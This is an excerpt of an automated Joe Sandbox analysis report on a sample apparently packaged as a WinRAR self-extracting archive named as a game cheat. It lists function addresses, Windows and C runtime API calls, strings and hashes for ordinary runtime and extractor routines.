                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                    • String ID:
                                                    • API String ID: 1247370737-0
                                                    • Opcode ID: 9d626b35b113f36b6c461fb797db2fd4a45d28fb5f3ab881de72db22eae01115
                                                    • Instruction ID: 9038a3c19917d617b6fb967094613486e19f20a734ead309d810e9b0216cfd2c
                                                    • Opcode Fuzzy Hash: 9d626b35b113f36b6c461fb797db2fd4a45d28fb5f3ab881de72db22eae01115
                                                    • Instruction Fuzzy Hash: A84128B55083059FC710DF65C884A6BBBF9FF88314F04892EF99AC2250E738E559CB62
                                                    Function 00CF2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CF2536
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                      • Part of subcall function 00D005DA: _wcslen.LIBCMT ref: 00D005E0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                    • String ID: ;%u$x%u$xc%u
                                                    • API String ID: 3053425827-2277559157
                                                    • Opcode ID: 578cdd5e5610bdb9a9a86efc85fbaab0adf979c417c98d37cb66eda5b594406b
                                                    • Instruction ID: 2ec21b99a1ed5d393dfd0f00e08e67fca400461e48d65a386e945f44a399c52b
                                                    • Opcode Fuzzy Hash: 578cdd5e5610bdb9a9a86efc85fbaab0adf979c417c98d37cb66eda5b594406b
                                                    • Instruction Fuzzy Hash: 11F1057160438C9BDB65EF2485D5BFA7799AB90300F080569EE8A9B283CB648949C773
                                                    Function 00D09CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                    • API String ID: 176396367-3568243669
                                                    • Opcode ID: a1a790ffd98efab9afaad4a2d989e84d71f491c60d81f3bb5f9c33955fd68639
                                                    • Instruction ID: 9596f87b62f67f6de0fc4228c642bf55b3fb2a661f5f979fbe9de3c30b22d120
                                                    • Opcode Fuzzy Hash: a1a790ffd98efab9afaad4a2d989e84d71f491c60d81f3bb5f9c33955fd68639
                                                    • Instruction Fuzzy Hash: FB51F76678632395DB309A6598317B7F3E1DFA1750F6C041AFDC98B1C2FBA58C818271
                                                    Function 00D1F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D1FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00D1F6CF
                                                    • __fassign.LIBCMT ref: 00D1F74A
                                                    • __fassign.LIBCMT ref: 00D1F765
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D1F78B
                                                    • WriteFile.KERNEL32(?,00000000,00000000,00D1FE02,00000000,?,?,?,?,?,?,?,?,?,00D1FE02,00000000), ref: 00D1F7AA
                                                    • WriteFile.KERNEL32(?,00000000,00000001,00D1FE02,00000000,?,?,?,?,?,?,?,?,?,00D1FE02,00000000), ref: 00D1F7E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    • API String ID: 1324828854-0
                                                    • Opcode ID: 5d4293a59dc8515ad0e229441b90fc2fe4124ca03f6e26c77d621de8d6a4e70b
                                                    • Instruction ID: 50ad3c829fc18bd505074adac934b0b24d953ef4b85ee17b4931d4a2238b14bf
                                                    • Opcode Fuzzy Hash: 5d4293a59dc8515ad0e229441b90fc2fe4124ca03f6e26c77d621de8d6a4e70b
                                                    • Instruction Fuzzy Hash: BB5196B5900249AFDB10CFA8EC55AEEBBF4EF09310F14416AE555E7291DB70A981CBB0
                                                    Function 00D12900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 00D12937
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00D1293F
                                                    • _ValidateLocalCookies.LIBCMT ref: 00D129C8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00D129F3
                                                    • _ValidateLocalCookies.LIBCMT ref: 00D12A48
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: 8b69578adea8db90c88774ea622b812f12cdef5d3097e05254c85647df44d153
                                                    • Instruction ID: a0f4b7610824e13fdd8e851614091595440ef4fa569cee6bcf55dc22a5be2729
                                                    • Opcode Fuzzy Hash: 8b69578adea8db90c88774ea622b812f12cdef5d3097e05254c85647df44d153
                                                    • Instruction Fuzzy Hash: 6841A530A00218BFCF10DF68E881AEEBBA5EF45314F148155E8159B352DB72DAA5CFB0
                                                    Function 00D09ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(?,00000000), ref: 00D09EEE
                                                    • GetWindowRect.USER32(?,00000000), ref: 00D09F44
                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00D09FDB
                                                    • SetWindowTextW.USER32(?,00000000), ref: 00D09FE3
                                                    • ShowWindow.USER32(00000000,00000005), ref: 00D09FF9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$RectText
                                                    • String ID: RarHtmlClassName
                                                    • API String ID: 3937224194-1658105358
                                                    • Opcode ID: cbaef4fbd7e2f1927a7181b1e5884ce1a23a99059a36420517f96aedb40c9658
                                                    • Instruction ID: 68db69b1513a37323e4bc26f56a7d6bebb15f7dfaa1d3eada0f6aa1fa5bdeca0
                                                    • Opcode Fuzzy Hash: cbaef4fbd7e2f1927a7181b1e5884ce1a23a99059a36420517f96aedb40c9658
                                                    • Instruction Fuzzy Hash: 85418D31004314AFDB219F789C48F6BBFA8EF48742F048559FD499A1A6CB34D954CB71
                                                    Function 00D09955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                    • API String ID: 176396367-3743748572
                                                    • Opcode ID: 669657ad7204a58fe0872ece91ffe2548c7117d51d96f7cc584f065f011d65c0
                                                    • Instruction ID: fe0123bcd3f933f1afcd951b4476641b758217d6dca084503d7d0d2af6463c9b
                                                    • Opcode Fuzzy Hash: 669657ad7204a58fe0872ece91ffe2548c7117d51d96f7cc584f065f011d65c0
                                                    • Instruction Fuzzy Hash: C5315E7274434566D630EB54BC52BBAF3A4EB90320F54841EF88A472C1FA50AD8483B1
                                                    Function 00D1C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00D1C868: _free.LIBCMT ref: 00D1C891
                                                    • _free.LIBCMT ref: 00D1C8F2
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D1C8FD
                                                    • _free.LIBCMT ref: 00D1C908
                                                    • _free.LIBCMT ref: 00D1C95C
                                                    • _free.LIBCMT ref: 00D1C967
                                                    • _free.LIBCMT ref: 00D1C972
                                                    • _free.LIBCMT ref: 00D1C97D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                    • Instruction ID: a9f021416fa166b2678176e0512d05ebb9bbb58e4154404c364a0870ad5a7c48
                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                    • Instruction Fuzzy Hash: 8511FCB15A0B14BAE520B7B1FC46FCB7BACDF04B00F805819B29D66092DF65A5859770
                                                    Function 00D0E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D0E669,00D0E5CC,00D0E86D), ref: 00D0E605
                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D0E61B
                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D0E630
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                    • API String ID: 667068680-1718035505
                                                    • Opcode ID: 38596810f4eaa26b4ac1289eb6bad5111fbeaf4eefd694a3dcf9463e821cca6d
                                                    • Instruction ID: 887cc85edfada3f3b7018ac13173b22634afe55a01119bc982aeafdd898501e3
                                                    • Opcode Fuzzy Hash: 38596810f4eaa26b4ac1289eb6bad5111fbeaf4eefd694a3dcf9463e821cca6d
                                                    • Instruction Fuzzy Hash: 69F0C2367813625F8F218E657D84B7663C86A367563480C79DD09D3280EB26CC555AF0
                                                    Function 00D0146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D014C2
                                                      • Part of subcall function 00CFB146: GetVersionExW.KERNEL32(?), ref: 00CFB16B
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D014E6
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D01500
                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D01513
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D01523
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D01533
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                    • String ID:
                                                    • API String ID: 2092733347-0
                                                    • Opcode ID: dac2b90234a72306488e95cf63bad096ae356e0ea5c1af6e92d1a071578bba2c
                                                    • Instruction ID: cbb991a32608eedf1fabed71a5aef3e2d73ba7187b452e677f95b31beb90d006
                                                    • Opcode Fuzzy Hash: dac2b90234a72306488e95cf63bad096ae356e0ea5c1af6e92d1a071578bba2c
                                                    • Instruction Fuzzy Hash: 2B31F879108305ABC700DFA8C88499BB7F8BF98714F004A1EF999C3250E734D519CBA6
                                                    Function 00D12AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00D12AF1,00D102FC,00D0FA34), ref: 00D12B08
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D12B16
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D12B2F
                                                    • SetLastError.KERNEL32(00000000,00D12AF1,00D102FC,00D0FA34), ref: 00D12B81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: c874d07dcb87efdb443e5ded267c63e9fbcb4c077fb2b4a4889839493b09a7da
                                                    • Instruction ID: bf29c7d3e43de84eda58d0176d9c147392aa0e978b510551f0ad03b369a59354
                                                    • Opcode Fuzzy Hash: c874d07dcb87efdb443e5ded267c63e9fbcb4c077fb2b4a4889839493b09a7da
                                                    • Instruction Fuzzy Hash: 39012F3220C3123EA6242EB47D869FA2F59EB21770B20033AF010822E4EF138D929274
                                                    Function 00D197E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,00D31030,00D14674,00D31030,?,?,00D13F73,00000050,?,00D31030,00000200), ref: 00D197E9
                                                    • _free.LIBCMT ref: 00D1981C
                                                    • _free.LIBCMT ref: 00D19844
                                                    • SetLastError.KERNEL32(00000000,?,00D31030,00000200), ref: 00D19851
                                                    • SetLastError.KERNEL32(00000000,?,00D31030,00000200), ref: 00D1985D
                                                    • _abort.LIBCMT ref: 00D19863
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    • API String ID: 3160817290-0
                                                    • Opcode ID: a2515e9d6efa9a90989728fdcd475ffddd971ef571260cb1212a950329d82a55
                                                    • Instruction ID: 0b7e0b8dbd9a9f7f33c6fb9ecdeaa3e2894f6c6850e3a1696f8230fe949ec130
                                                    • Opcode Fuzzy Hash: a2515e9d6efa9a90989728fdcd475ffddd971ef571260cb1212a950329d82a55
                                                    • Instruction Fuzzy Hash: DDF0F4352007017AC62237287C3AAEB9A65CFE2B31F280128F914D2292EF20C8868575
                                                    Function 00D0DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D0DC47
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0DC61
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0DC72
                                                    • TranslateMessage.USER32(?), ref: 00D0DC7C
                                                    • DispatchMessageW.USER32(?), ref: 00D0DC86
                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D0DC91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 2148572870-0
                                                    • Opcode ID: e34340467cc34ba02f86ef6d2bcf3e095991835205aa5d8202d46a286d9c9b33
                                                    • Instruction ID: b1d3236dc1970e009cfb6f54a77e1decc83958ab36daa4076a67cb8f8fe5a3f1
                                                    • Opcode Fuzzy Hash: e34340467cc34ba02f86ef6d2bcf3e095991835205aa5d8202d46a286d9c9b33
                                                    • Instruction Fuzzy Hash: 2AF03C72A01319BBCB206FA5DD4CECF7F6DEF55792B044411B90AD2194D6748646CBB0
                                                    Function 00CFC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00D005DA: _wcslen.LIBCMT ref: 00D005E0
                                                      • Part of subcall function 00CFB92D: _wcsrchr.LIBVCRUNTIME ref: 00CFB944
                                                    • _wcslen.LIBCMT ref: 00CFC197
                                                    • _wcslen.LIBCMT ref: 00CFC1DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcsrchr
                                                    • String ID: .exe$.rar$.sfx
                                                    • API String ID: 3513545583-31770016
                                                    • Opcode ID: c815cfe7b68c65c8ea133814c65a00f11e5d55ffbe479c95fc8b93abd5794d08
                                                    • Instruction ID: f8ef99930faad4ca8cccb5a8f701561d2f1d5cb161aa08f975d917a86e27c60f
                                                    • Opcode Fuzzy Hash: c815cfe7b68c65c8ea133814c65a00f11e5d55ffbe479c95fc8b93abd5794d08
                                                    • Instruction Fuzzy Hash: 1D41362670032DA6C775AF349A82A7F73A4EF41704F10450EFAA56B0C1EB504E96D3B3
                                                    Function 00D0CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 00D0CE9D
                                                      • Part of subcall function 00CFB690: _wcslen.LIBCMT ref: 00CFB696
